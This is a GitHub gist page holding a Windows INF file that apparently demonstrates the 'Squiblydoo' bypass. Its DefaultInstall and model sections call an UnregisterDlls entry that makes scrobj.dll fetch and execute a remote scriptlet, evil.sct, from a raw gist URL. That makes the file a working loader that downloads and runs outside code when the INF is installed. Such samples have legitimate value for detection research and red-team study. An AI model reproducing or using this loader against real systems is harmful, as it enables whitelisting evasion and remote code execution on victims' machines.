Last active
December 30, 2019 09:03
-
-
Save fareedfauzi/1565d618453258484575ebc98d953f5a to your computer and use it in GitHub Desktop.
INF file
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
; ---------------------------------------------------------------------- | |
; Required Sections | |
; ---------------------------------------------------------------------- | |
[Version] | |
Signature=$CHICAGO$ | |
Provider=test | |
Class=Printer | |
[Manufacturer] | |
HuntressLabs=ModelsSection,NTx86,NTia64,NTamd64 | |
; ---------------------------------------------------------------------- | |
; Models Section | |
; ---------------------------------------------------------------------- | |
[ModelsSection.NTx86] | |
UnregisterDlls = Squiblydoo | |
[ModelsSection.NTia64] | |
UnregisterDlls = Squiblydoo | |
[ModelsSection.NTamd64] | |
UnregisterDlls = Squiblydoo | |
; ---------------------------------------------------------------------- | |
; Support Sections | |
; ---------------------------------------------------------------------- | |
[DefaultInstall] | |
UnregisterDlls = Squiblydoo | |
[Squiblydoo] | |
11,,scrobj.dll,2,60,https://gist.githubusercontent.com/fareedfauzi/415eb13973fa0a0f39dce7b5576fc53f/raw/393f46c685ee072357b7aef3ae4893b1e276e2f8/evil.sct |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment